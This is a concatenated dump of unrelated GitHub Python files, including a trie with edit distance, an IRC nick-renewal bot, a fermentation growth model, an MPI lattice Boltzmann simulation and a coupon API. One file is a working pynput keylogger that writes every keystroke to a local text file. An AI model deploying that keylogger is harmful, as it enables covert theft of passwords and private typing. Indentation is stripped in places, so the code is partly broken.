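        # (table[i-1][j-1] + (0 if s[i-1] == t[j-1] else 1)).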
for i in range(1, m + 1):
for j in range(1, n + 1):
table[i][j] = min(1 + table[i - 1][j], 1 + table[i][j - 1],
int(s[i - 1] != t[j - 1]) + table[i - 1][j - 1])
        for row in table:
            print(row)
return table[-1][-1]
def get_all_words_of_trie(self):
words = []
for k in self.root.keys():
words.extend(self.get_start(k))
return words
def get_right_word(self,input_word):
'''
        Given an input word, return the correct (closest) word stored in the trie.
:param input_word:
:return:
'''
words = self.get_all_words_of_trie()
right_word = input_word
min_distance = 99999
for item in words:
distance = self.levenshtein_dp(input_word,item)
if min_distance > distance:
min_distance = distance
right_word = item
return right_word
if __name__ == "__main__":
trie = Trie()
trie.insert("中")
trie.insert("中国")
trie.insert("中国人")
trie.insert("中华人民共和国")
# print(trie.root)
trie.insert("Python")
trie.insert("Python 算法")
trie.insert("Python web")
trie.insert("Python web 开发")
trie.insert("Python web 开发 视频教程")
trie.insert("Python 算法 源码")
trie.insert("Perl 算法 源码")
# print(trie.search("Perl"))
# print(trie.search("Perl 算法 源码"))
# print((trie.get_start('P')))
# print((trie.get_start('Python web')))
# print((trie.get_start('Python 算')))
# print(trie.get_all_words_of_trie())
print(trie.levenshtein_dp("facbok","facebook"))
|
somenzz/geekbang
|
algorthms/trie.py
|
trie.py
|
py
| 4,115 |
python
|
en
|
code
| 5 |
github-code
|
6
|
23800674981
|
from pynput.keyboard import Key,Listener
keys=[]
def on_press(key):
try:
key=str(key)
if(key=='Key.enter'):
key='\n'
elif(key=='Key.space'):
key=' '
elif(key=='Key.alt'):
key=' alt '
elif(key=='Key.ctrl'):
key=' ctrl '
elif(key=='Key.backspace'):
key=' backspace '
        elif(key=='Key.shift'):
key=' shift '
        key=key.strip('\'')
        with open('a.txt','a') as f:
            f.write(key)
    except Exception as e:
        print(e)
#print("{0} pressed".format(key))
#def on_release(key):
# if(key==Key.esc):
# return False
try:
with Listener(on_press=on_press) as listener:
listener.join()
except:
print('\n...')
|
prajwalcbk/tools
|
keylogger/3.py
|
3.py
|
py
| 791 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30247773703
|
import random
# Split string method
names_string = input("Give me everybody's names, separated by a comma. ")
names = names_string.split(", ")
# 🚨 Don't change the code above 👆
#Write your code below this line 👇
number_of_names = len(names)
random_name = random.randint(0, number_of_names - 1)
buyer = names[random_name]
#line below is a shorter way of writing this code
#buyer = random.choice(names)
print(buyer + " is going to buy the meal today!")
|
ramirors1/Random-name
|
main.py
|
main.py
|
py
| 470 |
python
|
en
|
code
| 0 |
github-code
|
6
|
18658019054
|
'''
Created on Dec 13, 2022
@author: balut
'''
from erorrs.Errors import RepositoryException
from domain.entities import Bicicleta
class InFileRepositoryBiciclete(object):
'''
classdocs
'''
def __init__(self, fileName):
'''
Constructor
'''
self.__produse = []
self.__fileName = fileName
self.__loadFromFile()
def __exists(self, b):
for p in self.__produse:
if p.getID() == b.getID():
raise RepositoryException(
"!!!Bicicleta exista deja in lista de produse!!!\n")
def __store(self, b):
self.__exists(b)
self.__produse.append(b)
def __loadFromFile(self):
with open(self.__fileName, "r") as f:
lines = f.readlines()
for line in lines:
line = line.strip()
line = line.split(";")
id = int(line[0])
tip = line[1]
pret = float(line[2])
b = Bicicleta(id, tip, pret)
self.__store(b)
f.close()
def __saveToFile(self):
with open(self.__fileName, "w") as f:
for b in self.__produse:
strB = str(b.getID()) + ";" + b.getTip() + \
";" + str(b.getPret()) + "\n"
f.write(strB)
f.close()
def __findOne(self, id):
for b in self.__produse:
if b.getID() == id:
return b
raise RepositoryException(
"!!!Bicicleta nu exista in lista de produse!!!")
def get_all(self):
return self.__produse
def deleteByTip(self, tip):
self.__produse = [x for x in self.__produse if x.getTip() != tip]
self.__saveToFile()
def deleteByMax(self, maxx):
self.__produse = [x for x in self.__produse if x.getPret() != maxx]
self.__saveToFile()
def delete(self, id):
deleted = self.__findOne(id)
self.__produse.remove(deleted)
self.__saveToFile()
return deleted
|
Baluta-Lucian/FP
|
Projects/MagazinBicicleteSimulare/repository/InFileRepositoryBiciclete.py
|
InFileRepositoryBiciclete.py
|
py
| 2,069 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71271494589
|
dna = input()
new = ""
for i in dna:
if i not in 'ATGC':
new = "Invalid Input"
break
if i == 'A':
new += 'U'
elif i == 'C':
new += 'G'
elif i == 'T':
new += 'A'
else:
new += 'C'
print(new)
#or you can use this
b=input()
a="GCTA";c="CGAU"
try:print(''.join([c[a.index(i)]for i in b]))
except:print("Invalid Input")
|
anubhavsrivastava10/Leetcode-HackerEarth-Solution
|
HackerEarth/Jadoo and DNA Transcription.py
|
Jadoo and DNA Transcription.py
|
py
| 385 |
python
|
en
|
code
| 9 |
github-code
|
6
|
36417191928
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:
l = head
r = head
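        # Fast/slow pointers: r advances two nodes per step while l advances
        # one, so when r reaches the end l sits at the middle node (the second
        # of the two middles when the list length is even).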
while r != None and r.next != None:
r = r.next.next
l = l.next
return l
|
eyosiasbitsu/Competitive-programming-A2SV
|
Project Phase Camp/0876-middle-of-the-linked-list/0876-middle-of-the-linked-list.py
|
0876-middle-of-the-linked-list.py
|
py
| 443 |
python
|
en
|
code
| 3 |
github-code
|
6
|
33869960923
|
import fasttext
import pickle
model = fasttext.load_model('/data/disk1/private/yx/model200v2_8.bin', encoding='utf-8')
(wordnum,vec_size) = (len(model.words),model.dim)
word2id = {}
vecList = []
for idx,word in enumerate(model.words):
word2id[word] = idx
vecList.append(model[word])
with open("/data/disk1/private/yx/word2id.pkl","wb") as f:
pickle.dump((wordnum,vec_size),f)
pickle.dump(word2id,f)
import numpy as np
vecnp = np.asarray(vecList)
print(vecnp.shape)
np.save("/data/disk1/private/yx/vec_nor.npy",vecnp)
|
xcjthu/TopTextClassification
|
utils/powerlawtools/fastmodeltrans.py
|
fastmodeltrans.py
|
py
| 533 |
python
|
en
|
code
| 3 |
github-code
|
6
|
24742947009
|
from asyncirc import irc
import asyncirc.plugins.sasl
import asyncio, configparser, time, sys
config = configparser.ConfigParser(interpolation=None)
config.read('config.ini')
network = config["DEFAULT"]["network"]
server = config[network]["server"]
port = config[network]["port"]
bot_nick = config[network]['nick']
bot_password = config[network]['password']
conn = irc.connect(server, port, use_ssl=True)
conn.register(bot_nick, bot_nick, bot_nick)
asyncirc.plugins.sasl.auth(bot_nick, bot_password)
nicks_to_renew = []
nick_to_try = ""
@conn.on("irc-001")
def query_for_nicks(message):
print("Querying NickServ for list of nicks")
conn.say("NickServ", "info")
@conn.on("private-notice")
def extract_nicks(message, user, target, text):
if message.source != "NickServ!NickServ@services.":
print("Notice from user {}: {}".format(user.user, text))
return
if text.startswith("Nicks"):
global nicks_to_renew
nicks = text.split(":", 1)[1].strip()
nicks_to_renew += [nick for nick in nicks.split()
if nick != bot_nick]
print("Added `{}' to list of nicks".format(nicks))
elif "End of Info" in text:
# Run the first renew try at the end of the nickserv info
renew_next()
@conn.on("irc-nick")
def renew_next(message=""):
# Sleep 5 seconds before trying to renew a nick, due to nick changing rate limiting
time.sleep(5)
try:
global nick_to_try
nick_to_try = nicks_to_renew.pop()
except IndexError:
# Exit when we have no more nicks to renew
print("All nicks renewed. Exiting...")
conn.anything("QUIT :Done...")
sys.exit(0)
print("Trying to renew nick `{}'".format(nick_to_try))
conn.writeln("NICK {}".format(nick_to_try))
@conn.on("irc-433")
def nick_in_use(message):
print("Nickname `{}' is already in use. Skipping...".format(nick_to_try))
renew_next()
@conn.on("irc-437")
def nick_unavailable(message):
print("Nick `{}' is marked temporarily unavailable, releasing it...".format(nick_to_try))
conn.say("NickServ", "RELEASE {}".format(nick_to_try))
print("Retrying renew of `{}'".format(nick_to_try))
global nicks_to_renew
nicks_to_renew.append(nick_to_try)
renew_next()
@conn.on("irc-438")
def nick_change_ratelimit(message):
global nicks_to_renew
nicks_to_renew.append(nick_to_try)
print("Nick changing was rate limited, waiting 20 seconds")
time.sleep(20)
print("Nick changing resuming")
renew_next()
if __name__ == '__main__':
asyncio.get_event_loop().run_forever()
|
kyrias/reclaimer
|
reclaimer.py
|
reclaimer.py
|
py
| 2,611 |
python
|
en
|
code
| 2 |
github-code
|
6
|
32161722151
|
import sys
from pathlib import Path
from colorama import Fore
sys.path.append(str(Path(__file__).parent.parent))
from g4f import BaseProvider, models, Provider
logging = False
class Styles:
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def main():
providers = get_providers()
failed_providers = []
for _provider in providers:
if _provider.needs_auth:
continue
print("Provider:", _provider.__name__)
result = test(_provider)
print("Result:", result)
if _provider.working and not result:
failed_providers.append(_provider)
print()
if failed_providers:
print(f"{Fore.RED + Styles.BOLD}Failed providers:{Styles.ENDC}")
for _provider in failed_providers:
print(f"{Fore.RED}{_provider.__name__}")
else:
print(f"{Fore.GREEN + Styles.BOLD}All providers are working")
def get_providers() -> list[type[BaseProvider]]:
provider_names = dir(Provider)
ignore_names = [
"annotations",
"base_provider",
"BaseProvider",
"AsyncProvider",
"AsyncGeneratorProvider"
]
provider_names = [
provider_name
for provider_name in provider_names
if not provider_name.startswith("__") and provider_name not in ignore_names
]
return [getattr(Provider, provider_name) for provider_name in provider_names]
def create_response(_provider: type[BaseProvider]) -> str:
if _provider.supports_gpt_35_turbo:
model = models.gpt_35_turbo.name
elif _provider.supports_gpt_4:
model = models.gpt_4.name
else:
model = models.default.name
response = _provider.create_completion(
model=model,
messages=[{"role": "user", "content": "Hello, who are you? Answer in as much detail as possible."}],
stream=False,
)
return "".join(response)
def test(_provider: type[BaseProvider]) -> bool:
try:
response = create_response(_provider)
assert type(response) is str
assert len(response) > 0
return response
except Exception as e:
if logging:
print(e)
return False
if __name__ == "__main__":
main()
|
dovgan-developer/discord-bot-g4f
|
testing/test_providers.py
|
test_providers.py
|
py
| 2,239 |
python
|
en
|
code
| 1 |
github-code
|
6
|
14069562246
|
'''
Microbial growth model for A. niger,
including inhibition dynamics based on Haldane's equation
'''
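# For reference, the Haldane (Andrews) substrate-inhibition growth rate has the textbook form
#   mu = umax * S / (Ks + S + S**2 / Ki)
# which reduces to plain Monod kinetics, mu = umax * S / (Ks + S), as Ki -> infinity.
# The actual implementation used below lives in inhibition.haldane_3_products; the expression
# above is the standard form, not necessarily a verbatim copy of that function.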
##############################################################################
mic_name = 'A. niger'
print( '\n'*2, 'Summary of params used for species ', mic_name)
# Imports
from inhibition import load_csv
import matplotlib.pyplot as plt
import numpy as np
from scipy.integrate import odeint
from lmfit import Parameters, fit_report, minimize
from inhibition import plot_inhibition_curves, haldane_3_products
from control import show_fig
from control import fit_report_toggle
#######################################################################################
# Import dataset to fit model parameters:
# Include biomass optical density and cyanide concentration over time
# Extract required variables from measured data and carry out conversions
# Load measured data
measured_data, header = load_csv( 'CETIM - A niger data 1')
print('\nRaw measured data')
print(header, measured_data)
# Extract states
states_m = measured_data[:, 1:4] # states measured
state_names = header[1:4]
print('\nRaw extracted states')
print(state_names, '\n', states_m)
# Extract times at which to evaluate the solution of the ODE system
times_m = measured_data[:, 0]
print('\nMeasurement times')
print(header[0], times_m)
# Data cleaning
times_m = times_m[3:-1] - times_m[3]
states_m = states_m[3:-1,:]
# Set initial states
innoculum_size_0 = 1e5 #1.3e8
conversion_factor_IS = 1e-8  # grams/cell
cX_0 = innoculum_size_0 * conversion_factor_IS
print('\nInitial measured states')
initial_states = [ cX_0, 25, *states_m[0,:] ] # 5 g glycine
print(initial_states)
# Data cleaning
# for ax in range(0,1):
# states_m = np.delete( states_m, [1, 2], ax )
# times_m = np.delete( times_m, [1, 2], ax )
#######################################################################################
# Build model and define regression function
# Define model for parameter fitting
# def monod(f, t, umax, Ks, Yps, Yxs):
# X = f[0]
# S = f[1]
# P = f[2]
# u = umax * (S / (Ks + S))
# dXdt = u * X
# dSdt = -dXdt / Yxs
# dPdt = (-dSdt) * Yps
# dfdt = [dXdt, dSdt, dPdt]
# return dfdt
def monod( f, t, *args ):
'''
System of differential equations for:
1) Biomass production, x (Monod dynamics assumed)
2) Substrate consumption, s
3) Organic acid production, p
pgl -> gluconic acid
pox -> oxalic acid
pci -> citric acid
'''
# Element-wise unpacking of vectorised solution, f
x = f[0]
s = f[1]
if s <= 0:
return np.zeros(5)
else:
# Biomass production rate
dxdt = args[0]*( s / (args[1] + s) ) * x
# Substrate consumption rate
dsdt = - args[2] * dxdt # - args[3] * x
# Acid production rates
dpdt = [ - args[i] * dsdt for i in [3, 4, 5] ]
# Return ODE system
return [dxdt, dsdt, *dpdt]
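# In equation form, mirroring the code above (args = (umax, Ks, Yxs, Y_gluc, Y_oxal, Y_citr)
# in the order passed below):
#   dx/dt = umax * s / (Ks + s) * x
#   ds/dt = -Yxs * dx/dt            (Yxs enters as a multiplier here, exactly as coded)
#   dp_i/dt = -Y_i * ds/dt          for each acid i (gluconic, oxalic, citric)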
# Set model params
umax = 0.18  # /h
Ks = 62.24  # g/L
Yxs = 8.51
Yps_gluc_1 = 0.003
# Yps_gluc_2 = 0.4
Yps_oxal_1 = 0.4
# Yps_oxal_2 = 0.2
Yps_citr_1 = 0.06
# Yps_citr_2 = 0.02
params = Parameters()
params.add(name='umax', value= umax, min=0, vary=False)
params.add(name='Ks', value= Ks, min=0, vary=False)
params.add(name='Yxs', value= Yxs, min=0, vary=True)
params.add(name='Yps_gluc_1', value=Yps_gluc_1, vary=True)
# params.add(name='Yps_gluc_2', value=Yps_gluc_2, min=0, vary=True)
params.add(name='Yps_oxal_1', value=Yps_oxal_1, min=0, vary=True)
# params.add(name='Yps_oxal_2', value=Yps_oxal_2, min=0, vary=True)
params.add(name='Yps_citr_1', value=Yps_citr_1, min=0, vary=True)
# params.add(name='Yps_citr_2', value=Yps_citr_2, min=0, vary=True)
# Define regression
def regress( params ):
# Unpack params
umax = params['umax'].value
Ks = params['Ks'].value
Yxs = params['Yxs'].value
Yps_gluc_1 = params['Yps_gluc_1'].value
# Yps_gluc_2 = params['Yps_gluc_2'].value
Yps_oxal_1 = params['Yps_oxal_1'].value
# Yps_oxal_2 = params['Yps_oxal_2'].value
Yps_citr_1 = params['Yps_citr_1'].value
# Yps_citr_2 = params['Yps_citr_2'].value
args = ( umax, Ks, Yxs, Yps_gluc_1, Yps_oxal_1, Yps_citr_1 )
# Model prediction
c = odeint(monod, initial_states, times_m, args=args)
cX = c[:, 0]
# cS = c[:, 1]
cP0 = c[:, -3] # Gluconic
cP1 = c[:, -2] # Oxalic
cP2 = c[:, -1] # Citric
del c
weight = [1, 1, 10000, 10000, 10000]
# Compute error
I = ( states_m[:, 0] - cP0 )**2 + ( states_m[:, 1] - cP1 )**2 + (( states_m[:, 2] - cP2)*weight )**2
return I
# #######################################################################################
# Fit model parameters to measured data
# Minimise
method = 'Nelder'
result = minimize(regress, params, method=method)
result.params.pretty_print()
if fit_report_toggle:
print(fit_report(result))
# Redefine fitted model params
umax = result.params['umax'].value
Ks = result.params['Ks'].value
Yxs = result.params['Yxs'].value
Yps_gluc_1 = result.params['Yps_gluc_1'].value
# Yps_gluc_2 = result.params['Yps_gluc_2'].value
Yps_oxal_1 = result.params['Yps_oxal_1'].value
# Yps_oxal_2 = result.params['Yps_oxal_2'].value
Yps_citr_1 = result.params['Yps_citr_1'].value
# Yps_citr_2 = result.params['Yps_citr_2'].value
# args = (umax, Ks, Yxs, Yps_gluc_1, Yps_gluc_2, Yps_oxal_1, Yps_oxal_2, Yps_citr_1, Yps_citr_2)
args = (umax, Ks, Yxs, Yps_gluc_1, Yps_oxal_1, Yps_citr_1)
#######################################################################################
# Plot inhibition curves
xvline = 24
times_p = sorted( np.concatenate( ([xvline], np.linspace(1e-5, 300, 400)) ) )
Kis = np.array( [12.2] ) # [2, 3, 5, 10])
c_monod = odeint(monod, initial_states, times_p, args=args)
cX_no_inhib = c_monod[:,0] # Biomass concentration
cS_no_inhib = c_monod[:,1] # Substrate concentration
cP_no_inhib_1 = c_monod[:,2] # Product concentration
cP_no_inhib_2 = c_monod[:,3] # Product concentration
cP_no_inhib_3 = c_monod[:,4] # Product concentration
mic_name_1 = mic_name + ' (gluconic acid)'
mic_name_2 = mic_name + ' (oxalic acid)'
mic_name_3 = mic_name + ' (citric acid)'
# Plot biomass and sub. no inhibition curves
plot_inhibition_curves(
times_p,
initial_states,
[],
args,
haldane_3_products,
mic_name,
cX_no_inhib=cX_no_inhib,
cS_no_inhib=cS_no_inhib,
# cP_no_inhib=cP_no_inhib_1,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
# cP_measured=states_m[:,0],
# measurement_times=times_m
)
# Plot product no inhibition curve 1
plot_inhibition_curves(
times_p,
initial_states,
[],
args,
haldane_3_products,
mic_name_1,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_1,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,0],
measurement_times=times_m,
cP_index=2
)
# Plot product no inhibition curve 2
plot_inhibition_curves(
times_p,
initial_states,
[],
args,
haldane_3_products,
mic_name_2,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_2,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,1],
measurement_times=times_m,
cP_index=3
)
# Plot product no inhibition curve 3
plot_inhibition_curves(
times_p,
initial_states,
[],
args,
haldane_3_products,
mic_name_3,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_3,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,2],
measurement_times=times_m,
cP_index=4
)
#################################################################################
# Plot biomass and sub. inhibition curves
plot_inhibition_curves(
times_p,
initial_states,
Kis,
args,
haldane_3_products,
mic_name,
cX_no_inhib=cX_no_inhib,
cS_no_inhib=cS_no_inhib,
# cP_no_inhib=cP_no_inhib_1,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
# cP_measured=states_m[:,0],
# measurement_times=times_m
)
# Plot product inhibition curve 1
plot_inhibition_curves(
times_p,
initial_states,
Kis,
args,
haldane_3_products,
mic_name_1,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_1,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,0],
measurement_times=times_m,
cP_index=2
)
# Plot product inhibition curve 2
plot_inhibition_curves(
times_p,
initial_states,
Kis,
args,
haldane_3_products,
mic_name_2,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_2,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,1],
measurement_times=times_m,
cP_index=3
)
# Plot product inhibition curve 3
plot_inhibition_curves(
times_p,
initial_states,
Kis,
args,
haldane_3_products,
mic_name_3,
# cX_no_inhib=cX_no_inhib,
# cS_no_inhib=cS_no_inhib,
cP_no_inhib=cP_no_inhib_3,
# xvline=xvline,
show_fig=show_fig,
# cX_measured=Xy,
# cS_measured=Sy,
cP_measured=states_m[:,2],
measurement_times=times_m,
cP_index=4
)
|
TheoBatik/microbial_models
|
5b_A_niger.py
|
5b_A_niger.py
|
py
| 9,887 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14335019516
|
import numpy as np
import matplotlib.pyplot as plt
from mpi4py import MPI
from process_coordination import width_height, bool_boundaries, number_of_blocks
from streaming_functions import streaming, recalculate_functions
from plotting_functions import plot_velocity, plot_velocity_slice
# Initialize parallelization
comm = MPI.COMM_WORLD
size = comm.Get_size() # num of processes
rank = comm.Get_rank() # rank id of this process
n_timesteps = 20
n_plots = 3
# Initialize Grid:
nx_total = 20 # num of rows
ny_total = 16 # num of columns
# Arrange <size> blocks (num of processes) as an optimized grid of
# <n_blocks[0]> rows times <n_blocks[1]> columns.
n_blocks = number_of_blocks((nx_total, ny_total), size)
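# Illustrative mapping, assuming the row-major layout used for block_pos further below:
# with size = 6 processes and n_blocks = (2, 3), ranks 0..5 occupy block positions
# (0,0) (0,1) (0,2) / (1,0) (1,1) (1,2), e.g. rank 4 sits in row 1, column 1.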
# Initialize local grid parameters (local grid is the one of the block of this process):
# local size
nx, ny = width_height(rank, nx_total, ny_total, n_blocks)
nx_opt = nx_total//n_blocks[0]
ny_opt = ny_total//n_blocks[1]
# Initialize weights and discrete direction vectors
weights = np.array([4/9, 1/9, 1/9, 1/9, 1/9, 1/36, 1/36, 1/36, 1/36])
c = np.array([[0, 0], [0, 1], [-1, 0], [0, -1], [1, 0], [-1, 1], [-1, -1], [1, -1], [1, 1]])
# Initialize grid (add ghost points, i.e. dry nodes, to each edge)
rho = np.ones((nx+2, ny+2)) # density values
v = np.zeros((2, nx+2, ny+2)) # average velocity values
f = np.einsum("i,jk -> ijk", weights, np.ones((nx+2, ny+2))) # probability density function
# Check on which side this block borders another block or the boundary
borders = bool_boundaries(rank, n_blocks)
# Ranks of the processes of the neighboring blocks (only correct, and only used, when there is no boundary on that side)
rank_right = rank + 1
rank_left = rank - 1
rank_up = rank - n_blocks[1]
rank_down = rank + n_blocks[1]
# Loop over timesteps
for idx_time in range(n_timesteps):
# Calculate the streaming step wrt (global) boundary conditions
f, rho, v = streaming(f, rho, v, c, weights, borders)
# The order of communications matters so that every corner ghost point receives its diagonally adjacent value via two-step communication.
if not borders[0]:
comm.send(f[:, :, -2].copy(), rank_right)
data = comm.recv(source=rank_right)
f[:, :, -1] = data
if not borders[2]:
comm.send(f[:, :, 1].copy(), rank_left)
data = comm.recv(source=rank_left)
f[:, :, 0] = data
if not borders[1]:
comm.send(f[:, 1, :].copy(), rank_up)
data = comm.recv(source=rank_up)
f[:, 0, :] = data
if not borders[3]:
comm.send(f[:, -2, :].copy(), rank_down)
data = comm.recv(source=rank_down)
f[:, -1, :] = data
rho, v = recalculate_functions(f, rho, v, c) # Update values
# Plot average velocity vectors
if idx_time % (n_timesteps // n_plots) == 0:
# stack everything in rank 0
f_full = np.zeros((9, nx_total, ny_total))
rho_full = np.ones((nx_total, ny_total))
v_full = np.zeros((2, nx_total, ny_total))
f_list = comm.gather(f[:,1:-1,1:-1].copy(), root=0)
if rank == 0:
for rank_idx, f_block in enumerate(f_list):
block_pos = (rank_idx // n_blocks[1], rank_idx % n_blocks[1])
f_full[:, (nx_opt * block_pos[0]):(nx_opt * block_pos[0] + f_block.shape[1]), (ny_opt * block_pos[1]):(ny_opt * block_pos[1] + f_block.shape[2])] = f_block
rho_full, v_full = recalculate_functions(f_full, rho_full, v_full, c)
plot_velocity(f_full, v_full, return_plot=True)
plt.show()
|
Dunitrie/HPC
|
main.py
|
main.py
|
py
| 3,550 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27554887332
|
# Given an array of integers nums and an integer target, return indices of the two numbers such
# that they add up to target. You may assume that each input would have exactly one solution, and you
# may not use the same element twice. You can return the answer in any order.
# Example1
# Input: nums = [2, 7, 11, 15], target = 9
# Output: [0, 1]
# Explanation: Because nums[0] + nums[1] == 9, we return [0, 1].
def target_sum(arr, t):
# Keep an immutable copy so that indices can be recovered after popping
temp = tuple(arr)
res = []
while arr:
num = arr.pop()
diff = t - num
if diff in arr:
res.append((num, diff))
# Map each value pair back to its indices in the original list
res_idx = [(temp.index(i[0]), temp.index(i[1])) for i in res]
return res_idx
ar = [1, 5, 6, 7, 9, 8, 2, 3]
tar = 12
# ar = [2, 7, 11, 15]
# tar = 9
print(f'Given list:{ar} and target:{tar}')
print(target_sum(ar, tar))
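# A minimal hash-map sketch of the same problem (not part of the original file). It assumes
# exactly one valid pair exists, as the problem statement guarantees, and runs in O(n).
def two_sum(nums, target):
    seen = {}  # value -> index of the values visited so far
    for i, num in enumerate(nums):
        diff = target - num
        if diff in seen:
            return [seen[diff], i]
        seen[num] = i
    return []  # unreachable under the stated guarantee

print(two_sum([2, 7, 11, 15], 9))  # -> [0, 1]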
|
emurali08/Python_Revised_notes
|
Interview_tests/Interview_tests_2022/find_arr_items_to_target_sum.py
|
find_arr_items_to_target_sum.py
|
py
| 868 |
python
|
en
|
code
| null |
github-code
|
6
|
21998501456
|
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
ans = 0
i = 0
n = len(s)
sub_str = dict()
for j in range(n):
if s[j] in sub_str:
i = max(i, sub_str[s[j]])
ans = max(ans, j - i + 1)
sub_str[s[j]] = j + 1
return ans
so = Solution()
print(so.lengthOfLongestSubstring("abcabcbb"))
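# Worked example (illustrative): for "abcabcbb" the window grows to "abc" (length 3);
# each repeated character then moves the left edge i just past its previous occurrence,
# so the answer stays 3, which is what the call above prints.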
|
hangwudy/leetcode
|
1-99/3_最长无重复字串.py
|
3_最长无重复字串.py
|
py
| 402 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11301162272
|
from rest_framework.response import Response
from rest_framework.decorators import api_view
from datetime import datetime
from coupon.models import Coupon
from coupon.serializers import CouponSerializer
@api_view(['GET'])
def get_coupons(request):
user_id = request.GET.get('user_id')
expired = request.GET.get('expired')
page = request.GET.get('page')
limit = request.GET.get('limit')
if not user_id:
return Response({'success': False, 'message': '...'})
if not page:
page = 1
if not limit:
limit = 5
page = int(page)
limit = int(limit)
start = (page - 1) * limit
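# e.g. page=2, limit=5 -> start=5, so the slice below returns the 6th to 10th coupons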
if not expired:
coupons = Coupon.objects.filter(user_id=user_id, expire_time__gte=datetime.now()).order_by('expire_time')[start: start + limit]
else:
coupons = Coupon.objects.filter(user_id=user_id).order_by('expire_time')[start: start + limit]
serializer = CouponSerializer(coupons, many=True)
return Response({'success': True, 'message': 'Success', 'data': serializer.data})
|
jpswing/assmovie
|
coupon/views.py
|
views.py
|
py
| 1,042 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6600903749
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import date
import sys
if __name__ == '__main__':
# list of workers
workers = []
# run an endless loop that keeps asking for commands
while True:
# read a command from the terminal
command = input(">>>").lower()
# perform the action that matches the command
if command == 'exit':
break
elif command == 'add':
# prompt for the worker's data
name = input("First name: ")
fam = input("Last name: ")
year = input("Date of birth (yyyy.mm.dd): ")
tel = input("Phone (x-xxx-xxx-xx-xx): ")
# build a dictionary
worker = {
'name': name,
'fam': fam,
'year': year,
'tel': tel,
}
# append the dictionary to the list
workers.append(worker)
# sort the list if necessary
if len(workers) > 1:
workers.sort(key=lambda item: item.get('year', ''))
elif command.startswith('found '):
# split the command to extract the phone number
parts = command.split(' ', maxsplit=1)
# get the requested number
phone = parts[1]
# initialise the counter
count = 0
# check every worker record in the list
for worker in workers:
if worker.get('tel', '') == phone:
count += 1
print(
'{:>4}: {:>15} | {:>15} | {:>15}'.format(count, worker.get('name', ''), worker.get('fam', ''), worker.get('tel', ''))
)
# if the counter is still 0, no workers were found
if count == 0:
print("No workers with the given phone number were found.")
elif command == 'all':
line = '+-{}-+-{}-+-{}-+-{}-+-{}-+'.format(
'-' * 4,
'-' * 20,
'-' * 20,
'-' * 12,
'-' * 20
)
print(line)
print(
'| {:^4} | {:^20} | {:^20} | {:^12} | {:^20} |'.format(
"No.",
"First name",
"Last name",
"Year",
"Phone"
)
)
print(line)
for idx, worker in enumerate(workers, 1):
print(
'| {:^4} | {:^20} | {:^20} | {:^12} | {:^20} |'.format(
idx,
worker.get('name', ''),
worker.get('fam', ''),
worker.get('year', ''),
worker.get('tel', '')
)
)
print(line)
elif command == 'help':
# print a short usage guide
print("Available commands:\n")
print("add - add a worker;")
print("all - list all workers;")
print("found <x-xxx-xxx-xx-xx> - find a worker by phone number;")
print("help - show this help;")
print("exit - quit the program.")
else:
print(f"Unknown command {command}", file=sys.stderr)
|
Valentina1502/LABA_1
|
zd4.py
|
zd4.py
|
py
| 3,987 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
36148958510
|
class UTE:
"""
Model of a thermal power plant (UTE) in an energy planning study.
"""
def __init__(self,
ute_id: int,
nome: str,
capacidade: float,
custo: float):
self.id = ute_id
self.nome = nome
self.capacidade = capacidade
self.custo = custo
@classmethod
def le_ute_da_linha(cls, linha: str):
"""
Processes a line from the input file and builds the UTE object.
"""
ute_id = int(linha[1:7])
nome = linha[8:25].strip()
capacidade = float(linha[26:45])
custo = float(linha[46:65])
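# Fixed-width layout implied by the slices above (0-indexed character positions):
# id: 1-6, nome: 8-24, capacidade: 26-44, custo: 46-64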
return cls(ute_id,
nome,
capacidade,
custo)
def __str__(self):
to_str = ""
for k, v in self.__dict__.items():
to_str += "{}: {} - ".format(k, v)
return to_str
|
rjmalves/lpoe
|
modelos/ute.py
|
ute.py
|
py
| 950 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
6032334630
|
from AutoTensor.q_learning.config_scheme import *
class ConfigBuilder:
def __build_item(self, node, name):
if isinstance(node, ValueNode):
return node.default
elif isinstance(node, OptionsNode):
return node.options[node.default]
elif isinstance(node, ClassNode):
return {"class_name": name, "args": self.build(node.args)}
elif isinstance(node, ListNode):
return [
self.__build_item(node.options[node.default], node.default)
]
def build(self, scheme):
"""
Takes a scheme and using its defaults builds a config that
can be edited by actions, used as states for the QLearner,
and passed to the model_builder to build a tensorflow model.
"""
config = {}
for name, node in scheme.items():
if isinstance(node, SubScheme):
config[name] = self.build(node.body)
else:
config[name] = self.__build_item(node, name)
return config
|
epeters3/AutoTensor
|
